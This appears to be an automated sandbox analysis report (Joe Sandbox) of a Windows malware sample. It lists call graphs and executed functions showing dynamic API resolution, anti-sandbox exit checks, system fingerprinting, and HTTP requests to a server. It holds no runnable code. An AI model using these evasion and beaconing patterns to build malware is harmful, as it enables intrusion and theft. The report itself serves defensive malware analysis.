lstrcpy 26962->26980 26963->26950 26964 52fbe7 lstrcpy 26964->26980 26965 52efb0 35 API calls 26965->26980 26966->26915 26966->26916 26966->26917 26966->26918 26966->26919 26966->26921 26966->26922 26966->26924 26966->26926 26966->26927 26966->26928 26966->26931 26966->26939 26966->26943 26966->26947 26966->26949 26966->26952 26966->26954 26966->26955 26966->26961 26966->26964 26970 52f7e2 lstrcpy 26966->26970 26973 52fafc lstrcpy 26966->26973 26966->26980 26969 511610 4 API calls 26967->26969 26968->26967 26969->26982 26970->26966 26971 52f924 lstrcpy 26971->26980 26972 52f99e StrCmpCA 26972->26926 26972->26980 26973->26966 26974 52fc3e lstrcpy 26974->26980 26975 52fcb8 StrCmpCA 26975->26928 26975->26980 26976 52f9cb lstrcpy 26976->26980 26977 52ee90 28 API calls 26977->26980 26978 52fce9 lstrcpy 26978->26980 26979 52fa19 lstrcpy 26979->26980 26980->26920 26980->26923 26980->26925 26980->26926 26980->26928 26980->26933 26980->26962 26980->26965 26980->26966 26980->26971 26980->26972 26980->26974 26980->26975 26980->26976 26980->26977 26980->26978 26980->26979 26981 52fd3a lstrcpy 26980->26981 26981->26980 26982->26006 26984 532785 26983->26984 26985 53278c GetVolumeInformationA 26983->26985 26984->26985 26986 5327ec GetProcessHeap RtlAllocateHeap 26985->26986 26988 532822 26986->26988 26989 532826 wsprintfA 26986->26989 27206 5371e0 26988->27206 26989->26988 26993 514c70 26992->26993 26994 514c85 26993->26994 26995 514c7d lstrcpy 26993->26995 27210 514bc0 26994->27210 26995->26994 26997 514c90 26998 514ccc lstrcpy 26997->26998 26999 514cd8 26997->26999 26998->26999 27000 514cff lstrcpy 26999->27000 27001 514d0b 26999->27001 27000->27001 27002 514d2f lstrcpy 27001->27002 27003 514d3b 27001->27003 27002->27003 27004 514d6d lstrcpy 27003->27004 27005 514d79 27003->27005 27004->27005 27006 514da0 lstrcpy 27005->27006 27007 514dac InternetOpenA StrCmpCA 27005->27007 27006->27007 27008 514de0 27007->27008 27009 5154b8 InternetCloseHandle CryptStringToBinaryA 27008->27009 27214 533e70 27008->27214 27011 5154e8 LocalAlloc 27009->27011 27026 5155d8 27009->27026 27012 5154ff CryptStringToBinaryA 27011->27012 27011->27026 27013 515517 LocalFree 27012->27013 27014 515529 lstrlen 27012->27014 27013->27026 27015 51553d 27014->27015 27017 515563 lstrlen 27015->27017 27018 515557 lstrcpy 27015->27018 27016 514dfa 27019 514e23 lstrcpy lstrcat 27016->27019 27020 514e38 27016->27020 27022 51557d 27017->27022 27018->27017 27019->27020 27021 514e5a lstrcpy 27020->27021 27023 514e62 27020->27023 27021->27023 27024 51558f lstrcpy lstrcat 27022->27024 27025 5155a2 27022->27025 27027 514e71 lstrlen 27023->27027 27024->27025 27028 5155d1 27025->27028 27030 5155c9 lstrcpy 27025->27030 27026->26035 27029 514e89 27027->27029 27028->27026 27031 514e95 lstrcpy lstrcat 27029->27031 27032 514eac 27029->27032 27030->27028 27031->27032 27033 514ed5 27032->27033 27034 514ecd lstrcpy 27032->27034 27035 514edc lstrlen 27033->27035 27034->27033 27036 514ef2 27035->27036 27037 514efe lstrcpy lstrcat 27036->27037 27038 514f15 27036->27038 27037->27038 27039 514f36 lstrcpy 27038->27039 27040 514f3e 27038->27040 27039->27040 27041 514f65 lstrcpy lstrcat 27040->27041 27042 514f7b 27040->27042 27041->27042 27043 514fa4 27042->27043 27044 514f9c lstrcpy 27042->27044 27045 514fab lstrlen 27043->27045 27044->27043 27046 514fc1 27045->27046 27047 514fcd lstrcpy lstrcat 27046->27047 27048 514fe4 27046->27048 27047->27048 27049 51500d 27048->27049 27050 515005 lstrcpy 27048->27050 27051 515014 lstrlen 27049->27051 27050->27049 27052 51502a 27051->27052 27053 515036 lstrcpy lstrcat 27052->27053 27054 51504d 27052->27054 27053->27054 27055 515079 27054->27055 27056 515071 lstrcpy 27054->27056 27057 515080 lstrlen 27055->27057 27056->27055 27058 51509b 27057->27058 27059 5150ac lstrcpy lstrcat 27058->27059 27060 5150bc 27058->27060 27059->27060 27061 5150da lstrcpy lstrcat 27060->27061 27062 5150ed 27060->27062 27061->27062 27063 51510b lstrcpy 27062->27063 27064 515113 27062->27064 27063->27064 27065 515121 InternetConnectA 27064->27065 27065->27009 27066 515150 HttpOpenRequestA 27065->27066 27067 5154b1 InternetCloseHandle 27066->27067 27068 51518b 27066->27068 27067->27009 27221 537310 lstrlen 27068->27221 27072 5151a4 27229 5372c0 27072->27229 27075 537280 lstrcpy 27076 5151c0 27075->27076 27077 537310 3 API calls 27076->27077 27078 5151d5 27077->27078 27079 537280 lstrcpy 27078->27079 27080 5151de 27079->27080 27081 537310 3 API calls 27080->27081 27082 5151f4 27081->27082 27083 537280 lstrcpy 27082->27083 27084 5151fd 27083->27084 27085 537310 3 API calls 27084->27085 27086 515213 27085->27086 27087 537280 lstrcpy 27086->27087 27088 51521c 27087->27088 27089 537310 3 API calls 27088->27089 27090 515231 27089->27090 27091 537280 lstrcpy 27090->27091 27092 51523a 27091->27092 27093 5372c0 2 API calls 27092->27093 27094 51524d 27093->27094 27095 537280 lstrcpy 27094->27095 27096 515256 27095->27096 27097 537310 3 API calls 27096->27097 27098 51526b 27097->27098 27099 537280 lstrcpy 27098->27099 27100 515274 27099->27100 27101 537310 3 API calls 27100->27101 27102 515289 27101->27102 27103 537280 lstrcpy 27102->27103 27104 515292 27103->27104 27105 5372c0 2 API calls 27104->27105 27106 5152a5 27105->27106 27107 537280 lstrcpy 27106->27107 27108 5152ae 27107->27108 27109 537310 3 API calls 27108->27109 27110 5152c3 27109->27110 27111 537280 lstrcpy 27110->27111 27112 5152cc 27111->27112 27113 537310 3 API calls 27112->27113 27114 5152e2 27113->27114 27115 537280 lstrcpy 27114->27115 27116 5152eb 27115->27116 27117 537310 3 API calls 27116->27117 27118 515301 27117->27118 27119 537280 lstrcpy 27118->27119 27120 51530a 27119->27120 27121 537310 3 API calls 27120->27121 27122 51531f 27121->27122 27123 537280 lstrcpy 27122->27123 27124 515328 27123->27124 27125 5372c0 2 API calls 27124->27125 27126 51533b 27125->27126 27127 537280 lstrcpy 27126->27127 27128 515344 27127->27128 27129 515370 lstrcpy 27128->27129 27130 51537c 27128->27130 27129->27130 27131 5372c0 2 API calls 27130->27131 27132 51538a 27131->27132 27133 5372c0 2 API calls 27132->27133 27134 515397 27133->27134 27135 537280 lstrcpy 27134->27135 27136 5153a1 27135->27136 27137 5153b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27136->27137 27138 51549c InternetCloseHandle 27137->27138 27142 5153f2 27137->27142 27140 5154ae 27138->27140 27139 5153fd lstrlen 27139->27142 27140->27067 27141 51542e lstrcpy lstrcat 27141->27142 27142->27138 27142->27139 27142->27141 27143 515473 27142->27143 27144 51546b lstrcpy 27142->27144 27145 51547a InternetReadFile 27143->27145 27144->27143 27145->27138 27145->27142 27147 528cc6 ExitProcess 27146->27147 27148 528ccd 27146->27148 27149 528ee2 27148->27149 27150 528d30 lstrlen 27148->27150 27151 528e56 StrCmpCA 27148->27151 27152 528d5a lstrlen 27148->27152 27153 528dbd StrCmpCA 27148->27153 27154 528ddd StrCmpCA 27148->27154 27155 528dfd StrCmpCA 27148->27155 27156 528e1d StrCmpCA 27148->27156 27157 528e3d StrCmpCA 27148->27157 27158 528d06 lstrlen 27148->27158 27159 528d84 StrCmpCA 27148->27159 27160 528da4 StrCmpCA 27148->27160 27161 528e88 lstrlen 27148->27161 27162 528e6f StrCmpCA 27148->27162 27163 528ebb lstrcpy 27148->27163 27149->26037 27150->27148 27151->27148 27152->27148 27153->27148 27154->27148 27155->27148 27156->27148 27157->27148 27158->27148 27159->27148 27160->27148 27161->27148 27162->27148 27163->27148 27164->26043 27165->26045 27166->26051 27167->26053 27168->26059 27169->26061 27170->26067 27171->26071 27172->26077 27173->26079 27174->26083 27175->26097 27176->26101 27177->26100 27178->26096 27179->26100 27180->26118 27181->26103 27182->26104 27183->26108 27184->26114 27185->26115 27186->26122 27187->26125 27188->26131 27189->26154 27190->26158 27191->26157 27192->26153 27193->26157 27194->26167 27197 51161f 27196->27197 27198 51162b lstrcpy 27197->27198 27199 511633 27197->27199 27198->27199 27200 51164d lstrcpy 27199->27200 27201 511655 27199->27201 27200->27201 27202 51166f lstrcpy 27201->27202 27204 511677 27201->27204 27202->27204 27203 511699 27203->26889 27204->27203 27205 511691 lstrcpy 27204->27205 27205->27203 27207 5371e6 27206->27207 27208 532860 27207->27208 27209 5371fc lstrcpy 27207->27209 27208->26032 27209->27208 27211 514bd0 27210->27211 27211->27211 27212 514bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27211->27212 27213 514c41 27212->27213 27213->26997 27215 533e83 27214->27215 27216 533e9f lstrcpy 27215->27216 27217 533eab 27215->27217 27216->27217 27218 533ed5 GetSystemTime 27217->27218 27219 533ecd lstrcpy 27217->27219 27220 533ef3 27218->27220 27219->27218 27220->27016 27222 53732d 27221->27222 27223 51519b 27222->27223 27224 53733d lstrcpy lstrcat 27222->27224 27225 537280 27223->27225 27224->27223 27226 53728c 27225->27226 27227 5372b4 27226->27227 27228 5372ac lstrcpy 27226->27228 27227->27072 27228->27227 27231 5372dc 27229->27231 27230 5151b7 27230->27075 27231->27230 27232 5372ed lstrcpy lstrcat 27231->27232 27232->27230 27262 5331f0 GetSystemInfo wsprintfA 27237 524c77 296 API calls 27238 518c79 strcpy_s 27273 511b64 162 API calls 27288 51bbf9 90 API calls 27268 52f2f8 93 API calls 27246 52e0f9 140 API calls 27274 526b79 138 API calls 27258 532d60 11 API calls 27275 532b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27276 53a280 __CxxFrameHandler 27240 515869 57 API calls 27264 521269 408 API calls 27278 539711 10 API calls __setmbcp 27241 532c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27259 534e35 7 API calls 27289 51db99 673 API calls 27290 528615 47 API calls 27247 522499 290 API calls 27249 53749e memset ctype 27250 532880 10 API calls 27251 533480 6 API calls 27252 534480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27269 533280 7 API calls 27279 51b309 98 API calls 27253 528c88 16 API calls 27291 52abb2 120 API calls 27260 533130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27265 51f639 144 API calls 27270 5116b9 200 API calls 27281 51bf39 177 API calls 27254 5330a0 GetSystemPowerStatus 27263 5329a0 GetCurrentProcess IsWow64Process 27283 524b29 304 API calls 27292 5223a9 298 API calls

                          Executed Functions

                          Function 00514C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00514C7F
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00514CD2
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00514D05
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00514D35
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00514D73
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00514DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00514DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 18ef7441e5ff24d329ddf290ad56e1c7fbe9ff7980a28b9c2cac951e2dc55ea3
                          • Instruction ID: a79d9f60523792416533519965030bb1af454f3c4082a142e68a70e24a88efe2
                          • Opcode Fuzzy Hash: 18ef7441e5ff24d329ddf290ad56e1c7fbe9ff7980a28b9c2cac951e2dc55ea3
                          • Instruction Fuzzy Hash: 4A527C7590021A9BEB21EFB4DC49AEE7FBABF85300F045425F905A7251DB74DC828F90
                          Function 00536390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2125 536390-5363bd GetPEB 2126 5365c3-536623 LoadLibraryA * 5 2125->2126 2127 5363c3-5365be call 5362f0 GetProcAddress * 20 2125->2127 2129 536625-536633 GetProcAddress 2126->2129 2130 536638-53663f 2126->2130 2127->2126 2129->2130 2132 536641-536667 GetProcAddress * 2 2130->2132 2133 53666c-536673 2130->2133 2132->2133 2134 536675-536683 GetProcAddress 2133->2134 2135 536688-53668f 2133->2135 2134->2135 2137 536691-53669f GetProcAddress 2135->2137 2138 5366a4-5366ab 2135->2138 2137->2138 2139 5366d7-5366da 2138->2139 2140 5366ad-5366d2 GetProcAddress * 2 2138->2140 2140->2139
                          APIs
                          • GetProcAddress.KERNEL32(75900000,011A06D8), ref: 005363E9
                          • GetProcAddress.KERNEL32(75900000,011A0648), ref: 00536402
                          • GetProcAddress.KERNEL32(75900000,011A05B8), ref: 0053641A
                          • GetProcAddress.KERNEL32(75900000,011A0750), ref: 00536432
                          • GetProcAddress.KERNEL32(75900000,011A88C0), ref: 0053644B
                          • GetProcAddress.KERNEL32(75900000,01196940), ref: 00536463
                          • GetProcAddress.KERNEL32(75900000,01196720), ref: 0053647B
                          • GetProcAddress.KERNEL32(75900000,011A0768), ref: 00536494
                          • GetProcAddress.KERNEL32(75900000,011A0660), ref: 005364AC
                          • GetProcAddress.KERNEL32(75900000,011A07E0), ref: 005364C4
                          • GetProcAddress.KERNEL32(75900000,011A07F8), ref: 005364DD
                          • GetProcAddress.KERNEL32(75900000,01196740), ref: 005364F5
                          • GetProcAddress.KERNEL32(75900000,011A0810), ref: 0053650D
                          • GetProcAddress.KERNEL32(75900000,011A05A0), ref: 00536526
                          • GetProcAddress.KERNEL32(75900000,01196A20), ref: 0053653E
                          • GetProcAddress.KERNEL32(75900000,011A0780), ref: 00536556
                          • GetProcAddress.KERNEL32(75900000,011A0558), ref: 0053656F
                          • GetProcAddress.KERNEL32(75900000,01196780), ref: 00536587
                          • GetProcAddress.KERNEL32(75900000,011A0798), ref: 0053659F
                          • GetProcAddress.KERNEL32(75900000,011967A0), ref: 005365B8
                          • LoadLibraryA.KERNEL32(011A0840,?,?,?,00531C03), ref: 005365C9
                          • LoadLibraryA.KERNEL32(011A0570,?,?,?,00531C03), ref: 005365DB
                          • LoadLibraryA.KERNEL32(011A0588,?,?,?,00531C03), ref: 005365ED
                          • LoadLibraryA.KERNEL32(011A06F0,?,?,?,00531C03), ref: 005365FE
                          • LoadLibraryA.KERNEL32(011A0600,?,?,?,00531C03), ref: 00536610
                          • GetProcAddress.KERNEL32(75070000,011A0618), ref: 0053662D
                          • GetProcAddress.KERNEL32(75FD0000,011A0678), ref: 00536649
                          • GetProcAddress.KERNEL32(75FD0000,011A8F88), ref: 00536661
                          • GetProcAddress.KERNEL32(75A50000,011A8F58), ref: 0053667D
                          • GetProcAddress.KERNEL32(74E50000,01196840), ref: 00536699
                          • GetProcAddress.KERNEL32(76E80000,011A88B0), ref: 005366B5
                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 005366CC
                          Strings
                          • NtQueryInformationProcess, xrefs: 005366C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: eae37022f1630ea964fb0bad67a2480bfd9fbb6d95a46e170ed397841c87059c
                          • Instruction ID: 70d539590725610a8e371abebd1c94ba1002e401331f251b28ed8309bcf20d82
                          • Opcode Fuzzy Hash: eae37022f1630ea964fb0bad67a2480bfd9fbb6d95a46e170ed397841c87059c
                          • Instruction Fuzzy Hash: CDA172BD61121ADFD794DF64EC49A2B37B9F78A640700C51BEA1583370EB39A800DF69
                          Function 00531BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2141 531bf0-531c0b call 512a90 call 536390 2146 531c1a-531c27 call 512930 2141->2146 2147 531c0d 2141->2147 2151 531c35-531c63 2146->2151 2152 531c29-531c2f lstrcpy 2146->2152 2148 531c10-531c18 2147->2148 2148->2146 2148->2148 2156 531c65-531c67 ExitProcess 2151->2156 2157 531c6d-531c7b GetSystemInfo 2151->2157 2152->2151 2158 531c85-531ca0 call 511030 call 5110c0 GetUserDefaultLangID 2157->2158 2159 531c7d-531c7f ExitProcess 2157->2159 2164 531ca2-531ca9 2158->2164 2165 531cb8-531cca call 532ad0 call 533e10 2158->2165 2164->2165 2166 531cb0-531cb2 ExitProcess 2164->2166 2171 531ce7-531d06 lstrlen call 512930 2165->2171 2172 531ccc-531cde call 532a40 call 533e10 2165->2172 2178 531d23-531d40 lstrlen call 512930 2171->2178 2179 531d08-531d0d 2171->2179 2172->2171 2183 531ce0-531ce1 ExitProcess 2172->2183 2186 531d42-531d44 2178->2186 2187 531d5a-531d7b call 532ad0 lstrlen call 512930 2178->2187 2179->2178 2181 531d0f-531d11 2179->2181 2181->2178 2184 531d13-531d1d lstrcpy lstrcat 2181->2184 2184->2178 2186->2187 2189 531d46-531d54 lstrcpy lstrcat 2186->2189 2193 531d9a-531db4 lstrlen call 512930 2187->2193 2194 531d7d-531d7f 2187->2194 2189->2187 2199 531db6-531db8 2193->2199 2200 531dce-531deb call 532a40 lstrlen call 512930 2193->2200 2194->2193 2195 531d81-531d85 2194->2195 2195->2193 2197 531d87-531d94 lstrcpy lstrcat 2195->2197 2197->2193 2199->2200 2201 531dba-531dc8 lstrcpy lstrcat 2199->2201 2206 531e0a-531e0f 2200->2206 2207 531ded-531def 2200->2207 2201->2200 2209 531e11 call 512a20 2206->2209 2210 531e16-531e22 call 512930 2206->2210 2207->2206 2208 531df1-531df5 2207->2208 2208->2206 2211 531df7-531e04 lstrcpy lstrcat 2208->2211 2209->2210 2215 531e30-531e66 call 512a20 * 5 OpenEventA 2210->2215 2216 531e24-531e26 2210->2216 2211->2206 2228 531e68-531e8a CloseHandle Sleep OpenEventA 2215->2228 2229 531e8c-531ea0 CreateEventA call 531b20 call 52ffd0 2215->2229 2216->2215 2217 531e28-531e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 531ea5-531eae CloseHandle ExitProcess 2229->2233
                          APIs
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A06D8), ref: 005363E9
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0648), ref: 00536402
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A05B8), ref: 0053641A
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0750), ref: 00536432
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A88C0), ref: 0053644B
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,01196940), ref: 00536463
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,01196720), ref: 0053647B
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0768), ref: 00536494
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0660), ref: 005364AC
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A07E0), ref: 005364C4
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A07F8), ref: 005364DD
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,01196740), ref: 005364F5
                            • Part of subcall function 00536390: GetProcAddress.KERNEL32(75900000,011A0810), ref: 0053650D
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00531C2F
                          • ExitProcess.KERNEL32 ref: 00531C67
                          • GetSystemInfo.KERNEL32(?), ref: 00531C71
                          • ExitProcess.KERNEL32 ref: 00531C7F
                            • Part of subcall function 00511030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00511046
                            • Part of subcall function 00511030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0051104D
                            • Part of subcall function 00511030: ExitProcess.KERNEL32 ref: 00511058
                            • Part of subcall function 005110C0: GlobalMemoryStatusEx.KERNEL32 ref: 005110EA
                            • Part of subcall function 005110C0: ExitProcess.KERNEL32 ref: 00511114
                          • GetUserDefaultLangID.KERNEL32 ref: 00531C8F
                          • ExitProcess.KERNEL32 ref: 00531CB2
                          • ExitProcess.KERNEL32 ref: 00531CE1
                          • lstrlen.KERNEL32(011A8900), ref: 00531CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00531D15
                          • lstrcat.KERNEL32(00000000,011A8900), ref: 00531D1D
                          • lstrlen.KERNEL32(00544B98), ref: 00531D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531D48
                          • lstrcat.KERNEL32(00000000,00544B98), ref: 00531D54
                          • lstrlen.KERNEL32(00000000), ref: 00531D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531D94
                          • lstrlen.KERNEL32(00544B98), ref: 00531D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531DBC
                          • lstrcat.KERNEL32(00000000,00544B98), ref: 00531DC8
                          • lstrlen.KERNEL32(00000000), ref: 00531DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: 1b9888694a266916313f50558e57417803c9ef9a62a1898f125ba40c6f8f7512
                          • Instruction ID: 7b9f5288eaf026c600b7a0bb7c45bba5c00a8f4926c9297cef982bf610cec1dc
                          • Opcode Fuzzy Hash: 1b9888694a266916313f50558e57417803c9ef9a62a1898f125ba40c6f8f7512
                          • Instruction Fuzzy Hash: 6B71D43554061BABDB20ABB0DC4DB6F3FB9BF82701F048025FA06961A1DF789C41CB69
                          Function 00514A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2850 514a60-514afc RtlAllocateHeap 2867 514b7a-514bbe VirtualProtect 2850->2867 2868 514afe-514b03 2850->2868 2869 514b06-514b78 2868->2869 2869->2867
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00514AA2
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00514BB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
